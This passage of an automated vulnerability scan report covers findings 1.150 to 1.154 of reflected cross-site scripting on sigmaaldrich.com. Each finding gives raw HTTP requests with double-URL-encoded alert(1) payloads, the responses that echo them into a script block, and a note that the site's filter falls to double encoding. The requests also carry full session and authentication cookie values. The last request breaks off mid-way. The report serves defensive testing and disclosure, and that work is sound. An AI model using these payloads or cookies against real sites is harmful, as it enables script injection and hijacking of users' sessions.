Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service3d497";alert(1)//5ad6fd6b06e/about-us/meetings-and-shows","E404") ;
   </script>
...[SNIP]...

1.150. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 425f7%2522%253balert%25281%2529%252f%252fa910613c465 was submitted in the REST URL parameter 5. This input was echoed as 425f7";alert(1)//a910613c465 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/about-us425f7%2522%253balert%25281%2529%252f%252fa910613c465/meetings-and-shows HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:42 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/about-us425f7";alert(1)//a910613c465/meetings-and-shows","E404") ;
   </script>
...[SNIP]...

1.151. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 747e7%2522%253balert%25281%2529%252f%252fe17247fe650 was submitted in the REST URL parameter 6. This input was echoed as 747e7";alert(1)//e17247fe650 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows747e7%2522%253balert%25281%2529%252f%252fe17247fe650 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:43 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows747e7";alert(1)//e17247fe650","E404") ;
   </script>
...[SNIP]...

1.152. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acfbb%2522%253balert%25281%2529%252f%252f7b1a87dc9b4 was submitted in the REST URL parameter 1. This input was echoed as acfbb";alert(1)//7b1a87dc9b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentacfbb%2522%253balert%25281%2529%252f%252f7b1a87dc9b4/sigma-aldrich/customer-support/customer-service/services/basic-research HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:31 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentacfbb";alert(1)//7b1a87dc9b4/sigma-aldrich/customer-support/customer-service/services/basic-research","E404") ;
   </script>
...[SNIP]...

1.153. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1a12%2522%253balert%25281%2529%252f%252f35931b76d34 was submitted in the REST URL parameter 2. This input was echoed as d1a12";alert(1)//35931b76d34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichd1a12%2522%253balert%25281%2529%252f%252f35931b76d34/customer-support/customer-service/services/basic-research HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichd1a12";alert(1)//35931b76d34/customer-support/customer-service/services/basic-research","E404") ;
   </script>
...[SNIP]...

1.154. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9f32%2522%253balert%25281%2529%252f%252fde0fca75292 was submitted in the REST URL parameter 3. This input was echoed as a9f32";alert(1)//de0fca75292 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-supporta9f32%2522%253balert%25281%2529%252f%252fde0fca75292/customer-service/services/basic-research HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
